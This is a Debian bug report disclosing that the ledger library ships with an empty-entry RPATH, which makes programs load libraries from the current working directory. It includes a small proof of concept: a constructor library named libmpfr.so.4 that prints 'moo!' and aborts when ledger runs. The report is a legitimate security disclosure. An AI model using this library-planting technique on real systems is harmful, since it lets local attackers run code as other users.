Source: ledger
Severity: important
Version: 3.0.0+dfsg4-1
Tags: security
/usr/lib/ledger/libledger.so.3 has the following RPATH:
:::::::::::::::::::::::::
(Yes, this is 25 colons.)
RPATH works like $PATH: you can put multiple colon-separated items
there, and an empty item stands for current working directory. This
means that programs linking to libledger cannot be used securely when
current working directory is world-writable (for example /tmp). Local
malicious user could plant a crafted library there, tricking the program
to load arbitrary code.
PoC:
$ gcc -Wall -shared -fPIC moo.c -o libmpfr.so.4
$ ledger
moo!
Aborted
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.14-2-amd64 (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
Versions of packages ledger depends on:
ii libboost-filesystem1.55.0 1.55.0+dfsg-2
ii libboost-iostreams1.55.0 1.55.0+dfsg-2
ii libboost-regex1.55.0 1.55.0+dfsg-2
ii libboost-system1.55.0 1.55.0+dfsg-2
ii libc6 2.19-10
ii libgcc1 1:4.9.1-9
ii libgmp10 2:6.0.0+dfsg-6
ii libicu52 52.1-5
ii libmpfr4 3.1.2-1
ii libstdc++6 4.9.1-9
--
Jakub Wilk
#include <stdio.h>
#include <stdlib.h>
void f() __attribute__((constructor));
void f() { printf("moo!\n"); abort(); }